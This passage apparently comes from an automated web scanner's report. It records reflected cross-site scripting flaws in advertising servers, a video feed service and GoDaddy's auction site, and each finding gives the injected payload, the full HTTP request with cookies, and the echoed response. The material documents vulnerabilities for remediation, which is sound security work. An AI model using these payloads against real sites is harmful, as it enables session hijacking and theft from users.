<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-36731208_1289775864","http://ad.doubleclick.net//q1.mng_bang/news_frd80db'-alert(1)-'232fd6d5621;net=q1;u=,q1-36731208_1289775864,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.8. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72e02'-alert(1)-'70775120aca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.mng_bang/news_fr?72e02'-alert(1)-'70775120aca=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal; bkdp=1; blue=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7159
Date: Sun, 14 Nov 2010 23:04:21 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-66804179_1289775861","http://ad.doubleclick.net//q1.mng_bang/news_fr?72e02'-alert(1)-'70775120aca=1;net=q1;u=,q1-66804179_1289775861,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg-q1.none_h;;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg;btg=q1.none_h?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.9. http://a.collective-media.net/cmadj/q1.mng_bang/news_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.mng_bang/news_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3d68'-alert(1)-'4a0e64c7f72 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.mng_bang/news_fr;sz=c3d68'-alert(1)-'4a0e64c7f72 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: a.collective-media.net
Proxy-Connection: Keep-Alive
Cookie: JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; cli=11c4bc59fd87e17; dc=dal; bkdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 14 Nov 2010 23:03:09 GMT
Connection: close
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sun, 21-Nov-2010 23:03:09 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 15-Nov-2010 07:03:09 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 15-Nov-2010 23:03:09 GMT
Content-Length: 7663

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
vascript">CollectiveMedia.createAndAttachAd("q1-49672179_1289775789","http://ad.doubleclick.net/adj/q1.mng_bang/news_fr;net=q1;u=,q1-49672179_1289775789,11c4bc59fd87e17,none,cm.pb8k-cm.cm_xpd6_rtg;;sz=c3d68'-alert(1)-'4a0e64c7f72;contx=none;dc=d;btg=cm.pb8k;btg=cm.cm_xpd6_rtg?","c3d68'-alert(1)-'4a0e64c7f72","",false);</scr'+'ipt>
...[SNIP]...

3.10. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e026"><script>alert(1)</script>ad814dac87d was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6e026"><script>alert(1)</script>ad814dac87d HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://optimized-by.rubiconproject.com/a/1032/1043/25149-30.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.turn.com
Proxy-Connection: Keep-Alive
Cookie: uid=8441693682738835253; pf=G7uw0UCPo7PvpOJrNZFANZUHCBhlwUJib-Pnfu6GGf1KuJdtSpdpFAs3agira59TNTZr_LgRBOZLGS4MdfeEwaA1lm26KJ9mIjU1VkzGfYCzwZffaQdDZ5svKRV4Ii9eFPDLEkyDnAzRkt7g6VfEWH7ozde9AptzPwZok6Bq5ehIul0qe2CMWiL60nHGh--TW56MwhDaG7nkVZW2Tzm-pqqIG-zxBY-01EY5gtFKMsKryd1gNOfF21_E24a_JcWF; rrs=undefined%7C2%7C3%7Cundefined%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10; rds=undefined%7C14922%7C14922%7Cundefined%7Cundefined%7C14922%7C14922%7C14922%7C14922%7C14922%7C14922%7C14922%7C14922; rv=1; adImpCount=nnHnhFwdbiYnNf6CCbTDdU-DTTt0zN6RsH7OhVjp-l5d6ISB_q_vS5rapRhLZ6kjj0YDFg_jdVNYatEfU4EQCxikLvxOuDf1RI2JppXsGRAd6VNsKuS6eybUUr198rg4OuBmly3hczcEX9vwybSy-KHIN_nCjXzpFw20ZJoxtW4; fc=msHy0wyTcFJ_xlwc5vT-tR-5EvE7d_eMNmVZ3PF0Z7FCXB6jox4WkVcPXM7tklXdvfBz5xDsVEqchMpjM7fNhX_OedaOZuyHwOstXJyglrrSBkeFa-ntLdCl9WSdIh8U

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8441693682738835253; Domain=.turn.com; Expires=Fri, 13-May-2011 23:03:12 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 14 Nov 2010 23:03:11 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8441693682738835253&rnd=7043623080696515473&fpid=6e026"><script>alert(1)</script>ad814dac87d&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.11. http://ads.specificmedia.com/serve/v=5 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26281'-alert(1)-'0c55ba31e43 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=7038;cxt=811200901:2036102-99061164:2034566;kw=zBlPa1sz;ts=432463;smuid=9M_kfZJzlYDj0A;p=ui%3D9M_kfZJzlYDj0A%3Btr%3Dc5wfksxiptF%3Btm%3D0-026281'-alert(1)-'0c55ba31e43 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.specificmedia.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:03:10 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=4063.149173639154485001; domain=.specificmedia.com; path=/; expires=Mon, 19-Oct-2015 23:03:10 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 587
Expires: Sat, 13 Nov 2010 23:03:10 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<scr'+'ipt language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/N5282.160253.7946241563521/B4587511.249;sz=160x600;pc=[TPAS_ID];click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=7038%3Bc=115804%3Bb=688228%3Bp=ui%3D9M_kfZJzlYDj0A%3Btr%3Dc5wfksxiptF%3Btm%3D0-026281'-alert(1)-'0c55ba31e43%3Bts=20101114180310%3Bdct=;ord=20101114180310?">
...[SNIP]...

3.12. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bea1'-alert(1)-'dbc8ca0f6a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=7038;cxt=811200901:2036102-99061164:2034566;kw=zBlPa1sz;ts=432463;smuid=9M_kfZJzlYDj0A;p=ui%3D9M_kfZJzlYDj0A%3Btr%3Dc5wfksxiptF%3Btm%3D0-0&5bea1'-alert(1)-'dbc8ca0f6a1=1 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/breaking-news/ci_16611270?nclick_check=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ads.specificmedia.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:03:13 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=4063.149173639154485001; domain=.specificmedia.com; path=/; expires=Mon, 19-Oct-2015 23:03:13 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 590
Expires: Sat, 13 Nov 2010 23:03:13 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<scr'+'ipt language="JavaScript" type="text/javascript" src="http://ad.doubleclick.net/adj/N5282.160253.7946241563521/B4587511.249;sz=160x600;pc=[TPAS_ID];click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=7038%3Bc=115804%3Bb=688228%3Bp=ui%3D9M_kfZJzlYDj0A%3Btr%3Dc5wfksxiptF%3Btm%3D0-0&5bea1'-alert(1)-'dbc8ca0f6a1=1%3Bts=20101114180313%3Bdct=;ord=20101114180313?">
...[SNIP]...

3.13. http://ap.feeds.theplatform.com/ps/JSON/PortalService/2.2/getReleaseList [PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ap.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.2/getReleaseList

Issue detail

The value of the PID request parameter is copied into the HTML document as plain text between tags. The payload fafd7<img%20src%3da%20onerror%3dalert(1)>ce4f20f87e3 was submitted in the PID parameter. This input was echoed as fafd7<img src=a onerror=alert(1)>ce4f20f87e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.2/getReleaseList?PID=oUFmCcyEZuCA7UqChCElKJFTJxFcgO9Gfafd7<img%20src%3da%20onerror%3dalert(1)>ce4f20f87e3&query=ContentCustomText|CustomerID|CAJOS&field=contentCustomData HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://img.video.ap.org/p/s/sm_hz_3thumb_scroll.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: ap.feeds.theplatform.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Mon, 15 Nov 2010 00:43:02 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid02 (squid/3.0.STABLE23)
Connection: close

"The PID looks like it was cut-off (\"oUFmCcyEZuCA7UqChCElKJFTJxFcgO9Gfafd7<img src=a onerror=alert(1)>ce4f20f87e3\"). This PID is 76 character(s) long, when it should be 32 characters long."

3.14. http://ap.feeds.theplatform.com/ps/JSON/PortalService/2.2/getReleaseList [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ap.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.2/getReleaseList

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload ff556<img%20src%3da%20onerror%3dalert(1)>4349ba1ee07 was submitted in the query parameter. This input was echoed as ff556<img src=a onerror=alert(1)>4349ba1ee07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.2/getReleaseList?PID=oUFmCcyEZuCA7UqChCElKJFTJxFcgO9G&query=ff556<img%20src%3da%20onerror%3dalert(1)>4349ba1ee07&field=contentCustomData HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://img.video.ap.org/p/s/sm_hz_3thumb_scroll.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: ap.feeds.theplatform.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Mon, 15 Nov 2010 00:45:03 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid02 (squid/3.0.STABLE23)
Connection: close

"\"ff556<img src=a onerror=alert(1)>4349ba1ee07\" is an unknown query title."

3.15. https://auctions.godaddy.com/ [ci parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the ci request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d78be"%3balert(1)//d2ac33e709a was submitted in the ci parameter. This input was echoed as d78be";alert(1)//d2ac33e709a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ci=13117d78be"%3balert(1)//d2ac33e709a&isc=GPPT03A117&domain=sftimes.com HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=vwx4pw45xf1n4zywv0gdvx45; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=13117d78be%22%3balert(1)%2f%2fd2ac33e709a&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 210262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart() {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?ci=13117d78be";alert(1)//d2ac33e709a&isc=GPPT03A117&domain=sftimes.com");
                   if (getObj("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); }
                   else if (getObj("ctl00_cphMaster
...[SNIP]...

3.16. https://auctions.godaddy.com/ [ci parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the ci request parameter is copied into a JavaScript rest-of-line comment. The payload 6c4df%0aalert(1)//42f0cddfa42 was submitted in the ci parameter. This input was echoed as 6c4df
alert(1)//42f0cddfa42
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ci=131176c4df%0aalert(1)//42f0cddfa42&isc=GPPT03A117&domain=sftimes.com HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=wrqsrz452daet5ecdizpbbnt; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=131176c4df%0aalert(1)%2f%2f42f0cddfa42&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
e = getObj("loginname-loginname").value;
               getObj("auctionPassword").value = getObj("password-password").value;
               setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?ci=131176c4df
alert(1)//42f0cddfa42
&isc=GPPT03A117&domain=sftimes.com");
               document.auctionLoginForm.submit();
           }

           function closePods(header)
           {
               shsClose(1); shsClose(2); shsClose(3); shsClose(4); shsClose(5);
               sh
...[SNIP]...

3.17. https://auctions.godaddy.com/ [ci parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the ci request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17699"style%3d"x%3aexpression(alert(1))"651a2b61a83 was submitted in the ci parameter. This input was echoed as 17699"style="x:expression(alert(1))"651a2b61a83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?ci=1311717699"style%3d"x%3aexpression(alert(1))"651a2b61a83&isc=GPPT03A117&domain=sftimes.com HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=GPPT03A117; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=1lznjf45ui030teszo4b4ijt; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=1311717699%22style%3d%22x%3aexpression(alert(1))%22651a2b61a83&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<img id="imgTraf" src="https://img.godaddy.com/image.aspx?plid=1&isc=GPPT03A117&ci=1311717699"style="x:expression(alert(1))"651a2b61a83&page_name=%2ftrpHome.aspx&site=auctions.godaddy.com&referrer=&querystring=ci%3d1311717699%2522style%253d%2522x%253aexpression(alert(1))%2522651a2b61a83%26isc%3dGPPT03A117%26domain%3dsftimes.com&rnd=14
...[SNIP]...

3.18. https://auctions.godaddy.com/ [domain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96ca7"%3balert(1)//7e769ef789a was submitted in the domain parameter. This input was echoed as 96ca7";alert(1)//7e769ef789a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?isc=gppt02C007&domain=sftimes.com96ca7"%3balert(1)//7e769ef789a HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:11:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=gppt02C007; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=lzq1nt55ofi2tt55amvykt45; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=isc=gppt02C007&domain=sftimes.com96ca7%22%3balert(1)%2f%2f7e769ef789a&shopper=&privatelabelid=1&isc=gppt02C007&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart() {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?isc=gppt02C007&domain=sftimes.com96ca7";alert(1)//7e769ef789a");
                   if (getObj("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); }
                   else if (getObj("ctl00_cphMaster_tbOfferAmount"))
                   { setCooki
...[SNIP]...

3.19. https://auctions.godaddy.com/ [domain parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The value of the domain request parameter is copied into a JavaScript rest-of-line comment. The payload a2165%0aalert(1)//163af430c02 was submitted in the domain parameter. This input was echoed as a2165
alert(1)//163af430c02
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?isc=gppt02C007&domain=sftimes.coma2165%0aalert(1)//163af430c02 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:11:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=gppt02C007; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=zzdqwy55liflezmzqlrf0pnu; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=isc=gppt02C007&domain=sftimes.coma2165%0aalert(1)%2f%2f163af430c02&shopper=&privatelabelid=1&isc=gppt02C007&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209764


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
inname").value;
               getObj("auctionPassword").value = getObj("password-password").value;
               setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?isc=gppt02C007&domain=sftimes.coma2165
alert(1)//163af430c02
");
               document.auctionLoginForm.submit();
           }

           function closePods(header)
           {
               shsClose(1); shsClose(2); shsClose(3); shsClose(4); shsClose(5);
               shsClose(6); shsClose(7); shsClose(8
...[SNIP]...

